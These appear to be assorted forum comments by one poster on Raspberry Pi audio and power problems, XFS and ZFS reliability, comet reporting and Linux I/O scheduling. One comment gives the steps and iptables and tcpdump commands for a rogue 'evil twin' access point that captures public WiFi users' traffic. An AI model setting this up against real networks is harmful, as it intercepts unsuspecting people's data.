Adding a couple of chips to make one of your platforms more software-compatible with the others reduces development costs. That doesn't make them bastards in any way.
Funny coincidence, four days ago I woke up in an ambulance (long boring story) and the number on the inside door was 6502. I smiled stupidly and said "Hah! 6502!" and looked at the two EMTs sitting next to me. They looked quizzically at me.
"Oh right, I'm old." I said.
Not "sound server" in the sense that you mean.
One of the boards is to be tasked with replacing an aging automatic player in an interactive information booth; the other would replace two loop players in localized FM broadcasts for visitors to a tourist centre.
They'd serve sound to the public, not to network clients. But that still makes them servers.
I bought two Raspberry Pi(es) to use as audio servers and have been disappointed by the sound quality. The on-board audio output's DSP has limited bandwidth, so sound is down-sampled to 11 bits. Scratchy. It's not advertised, so that was a let-down.
Using a USB audio dongle is a no-go either, because of the crappy USB drivers: it stutters non-stop. Here are oscilloscope grabs of two music samples and a 1 kHz tone: http://imgur.com/a/rVR99 The flat parts shouldn't be there. The only way to get good sound right now is to use rather expensive USB sound boards or the HDMI output, but extracting line-level audio from HDMI isn't a simple or cheap proposition.
The power design should be re-thought. If you power your Pi with exactly 5 volts, the voltage drop across the polyfuses causes early failures when you connect peripherals with moderate current demands. If you're lucky, your power adapter might supply a bit more than 5 volts (5.25 is nice) and you might not experience too many problems. Me, I've soldered supply wires to test points T1 (vcc) and T2 (gnd) and bypassed the fuses completely.
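To put rough numbers on that, here's a back-of-envelope sketch. The 0.3 ohm polyfuse resistance and the 1 A load are assumed values for illustration, not measured specs; the 4.75 V floor is the USB minimum bus voltage.

```python
# Back-of-envelope for the polyfuse drop described above.
# fuse_ohms is an assumed figure, not a measured spec.
def rail_voltage(supply_v, fuse_ohms, load_a):
    """5V-rail voltage left after the drop across the input polyfuse."""
    return supply_v - fuse_ohms * load_a

# Exactly 5 V in, board plus peripherals drawing 1 A: ~4.7 V on the rail,
# under the 4.75 V USB floor.
print(rail_voltage(5.00, 0.3, 1.0))

# A generous 5.25 V adapter buys the headroom back: ~4.95 V.
print(rail_voltage(5.25, 0.3, 1.0))
```

Bypassing the fuses, as above, removes the drop entirely, at the cost of losing the over-current protection.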
I hope they come up with another revision, add a low-dropout regulator (+$2), and figure out the USB niggles.
Until then, caveat emptor.
I saw it back in 1987 over Montreal. Not only was it really neat to see the shuttle "in person", it was magnificent to see a 747 flying so low over my town.
If you're there, don't miss it!
FTA: Fragmentation in comets is rarely observed, but can occur when they are closest to the sun and develop spectacular tales of gas, dust and ice particles. The tale originates from the icy core (or nucleus), so when it heats up, vapor from sublimating ices are outgassed into space, dislodging dust and other material.
Shouldn't that be "tails" and "tail", or some different definition of the word "tale" I wasn't previously aware of?
*yours. Glass houses and such.
You know, after working on my own long-term project (25 years between updates), which Spacewar over-shadows by a factor of two, I've realized that code I write now, no matter how trivial, may be read back a long time afterward. And since I'm a very sloppy programmer, this is embarrassing on a large scale.
Oh well. http://sites.google.com/site/dannychouinard/Home/rdos3-2-coco2-enhanced-dos if you're curious.
XFS is extremely prone to data corruption if the system goes down uncleanly for any reason. We may strive for nine nines, but stuff still happens. A power failure on a large XFS volume is almost guaranteed to lead to truncated files and general lost data. Not so on ZFS.
[Citation Needed] as wikipedia would say. XFS is no more prone to data corruption than any other journalled filesystem in the event of unexpected halts.
You should see the fireworks I got on Solaris 10 while I was running a script that did a bunch of zpool commands just as the power went out. Borked everything.
I love ZFS, but I'm not deluded into thinking it's magic.
The entertainment packages don't have to live on the other side of the firewall, and they're not necessary to the security of the passengers. The article refers to the automotive module, which controls engine functions.
Very different things.
Luxury. We used to have to get out of the lake at six o'clock in the morning, clean the lake, eat a handful of gravel, work twenty hour day at mill for tuppence a month, come home, and Dad would thrash us to sleep with a broken bottle, if we were lucky!
Meanwhile I'm working on a micro-controller project that runs at 500 Hz (not kilo, just hertz).
If you keep the code tight and hand-craft it, 128 MHz is blindingly fast.
Idiots like this give the IT security field a bad name as being made up of charlatans and snake-oil salesmen.
Sadly, in my experience, it mostly is made up of charlatans, snake-oil salesmen and incompetents. Good security people are really rare.
1. Bring a laptop with an extra WiFi dongle into a public area.
2. Connect to the free WiFi spot using the internal NIC.
3. Act as an access point on the second NIC with a cooler-sounding SSID.
4. NAT traffic to the first WiFi network and grab everything of interest.
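Steps 3 and 4 amount to a few lines on Linux. A sketch, with assumptions: interface names (wlan0 for the client side, wlan1 for the rogue AP side, already brought up by hostapd), iptables as the firewall, root privileges, and a lab setting where you're allowed to do this.

```shell
# wlan0: associated with the real "Free WiFi" AP.
# wlan1: our rogue AP, served by hostapd with the attractive SSID.

sysctl -w net.ipv4.ip_forward=1          # let the box route packets

# NAT the victims' traffic out through the real hotspot:
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o wlan0 -j ACCEPT
iptables -A FORWARD -i wlan0 -o wlan1 -m state \
         --state RELATED,ESTABLISHED -j ACCEPT

# "Grab everything of interest":
tcpdump -i wlan1 -w captured.pcap
```

Everything flows through your box in the clear (minus TLS), which is exactly why "cooler-sounding SSID" attacks work.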
The problem is this: let's say you do an action that reads 5 blocks from the disk. While the system is idle it has nothing else to do, so your 5 blocks are read immediately, super fast.
While the system is doing some other I/O-intensive job, it might be doing 500 block reads at the same time. Everything goes into the same queue, so your task is only 1% of the requests that have to be done in a set time. Result: your task takes 100 times longer.
This is the problem all the schedulers are trying to solve: being fair so that every task gets a reasonable share of priority, while keeping overall performance at an optimum level.
For example, some O/S researchers have tried to implement multi-tiered systems where every I/O is tagged with flags indicating whether the call came from an interactive user action or was generated by non-interactive jobs (daemons, lower-level layers, etc.), and then give higher priority to the user requests. Two problems with that approach are that it can be very hard to differentiate the two, and that a heavy user task may prevent system tasks from running in a timely fashion while the user tasks depend on those very system tasks completing in order to proceed: vicious circles and race conditions.
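A minimal sketch of that tiered idea, with the same toy workload as before. The tags and tick costs are made up for illustration; real kernels juggle far messier bookkeeping, and this deliberately ignores the priority-inversion problem described above.

```python
import heapq

def drain(requests):
    """requests: list of (priority, seq, name) tuples; lower priority
    number is served first. Returns finish tick per request name."""
    heapq.heapify(requests)
    t, finished = 0, {}
    while requests:
        _, _, name = heapq.heappop(requests)
        t += 1
        finished[name] = t
    return finished

# 500 background reads (priority 1) queued ahead of 5 interactive
# reads (priority 0):
reqs = [(1, i, f"bg{i}") for i in range(500)] + \
       [(0, 500 + i, f"user{i}") for i in range(5)]
done = drain(reqs)
print(done["user4"])   # interactive work finishes in 5 ticks, not 505
```

The interactive requests jump the queue, so the user sees 5 ticks of latency instead of 505; the cost is that the last background read now waits behind them.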
I'm glad I'm not trying to code a kernel scheduler. These are very hard problems, and figuring out one that can be fair for all types of use is nigh impossible.
The great thing about the open-source O/Ss is that everything's done in the open: there are intense discussions going on in the field, and there are multiple solutions being worked on and tested.
To me, Linux has always felt like it gave much higher priority to I/O than to the "user experience". It's something I've come to expect. If I copy gigabytes from one disk set to another, I gladly accept that my web browser is going to be sluggish for a while, all the while feeling content that at least the copy is being done so efficiently that it will take the shortest time possible.
Other O/Ss that I won't name may "feel" better, but have nowhere near the same I/O throughput that Linux has.